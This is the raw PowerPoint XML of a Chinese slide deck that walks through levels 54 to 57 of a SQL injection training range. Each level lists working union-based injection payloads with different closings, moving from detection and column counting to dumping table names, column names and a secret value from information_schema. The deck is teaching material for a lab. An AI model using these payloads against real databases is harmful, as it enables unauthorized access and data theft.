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457" r:id="rId2"/>
    <p:sldId id="1394" r:id="rId3"/>
    <p:sldId id="1486" r:id="rId4"/>
    <p:sldId id="1487" r:id="rId5"/>
    <p:sldId id="1493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6"/>
        <p:guide pos="3807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8253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靶场原理详解（十三）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第五十四关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E9D789-DAD6-4757-9E30-5A151D5C3DE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965430" y="1592796"/>
            <a:ext cx="10261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判断是否存在注入以及闭合：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1=2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 altLang="zh-CN"/>
              <a:t>qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断字段数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'order by  1-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断显错位：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'union select 1,2,3 -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'union select 1,table_name,3 from information_schema.tables where table_schema=database() -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断列名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'union select 1,group_concat(column_name),3 from information_schema. columns where table_schema=database() and table_name='jg9njybt72' -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断具体数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'union select 1, group_concat(secret_EK84),3 from jg9njybt72 -- qwe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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>五十五关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63DF4D-A743-4DA8-8134-10530539B5D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965430" y="1592796"/>
            <a:ext cx="10261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判断是否存在注入以及闭合：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1=2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 altLang="zh-CN"/>
              <a:t>qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断字段数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)order by  1-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断显错位：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)union select 1,2,3 -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)union select 1,table_name,3 from information_schema.tables where table_schema=database() -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断列名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)union select 1,group_concat(column_name),3 from information_schema. columns where table_schema=database() and table_name='jg9njybt72' -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断具体数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)union select 1, group_concat(secret_EK84),3 from jg9njybt72 -- qwe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第五十六关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57E8E-FDDD-4B4C-A232-315A699B7893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965430" y="1592796"/>
            <a:ext cx="10261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判断是否存在注入以及闭合：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>')and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1=2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 altLang="zh-CN"/>
              <a:t>qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断字段数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>')order by  1-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断显错位：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>')union select 1,2,3 -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>')union select 1,table_name,3 from information_schema.tables where table_schema=database() -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断列名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>')union select 1,group_concat(column_name),3 from information_schema. columns where table_schema=database() and table_name='jg9njybt72' -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断具体数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>')union select 1, group_concat(secret_EK84),3 from jg9njybt72 -- qwe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第五十七关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5EA668-2AC5-489E-98F9-AF76888F1C66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965430" y="1592796"/>
            <a:ext cx="10261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判断是否存在注入以及闭合：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>"and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1=2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 altLang="zh-CN"/>
              <a:t>qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断字段数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>"order by  1-- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断显错位：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>"union select 1,2,3 -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>"union select 1,table_name,3 from information_schema.tables where table_schema=database() -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断列名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>"union select 1,group_concat(column_name),3 from information_schema. columns where table_schema=database() and table_name='jg9njybt72' -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断具体数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>"union select 1, group_concat(secret_EK84),3 from jg9njybt72 -- qwe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501</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>56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第五十四关</vt:lpstr>
      <vt:lpstr>第五十五关</vt:lpstr>
      <vt:lpstr>第五十六关</vt:lpstr>
      <vt:lpstr>第五十七关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3131</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-07T08:51:41Z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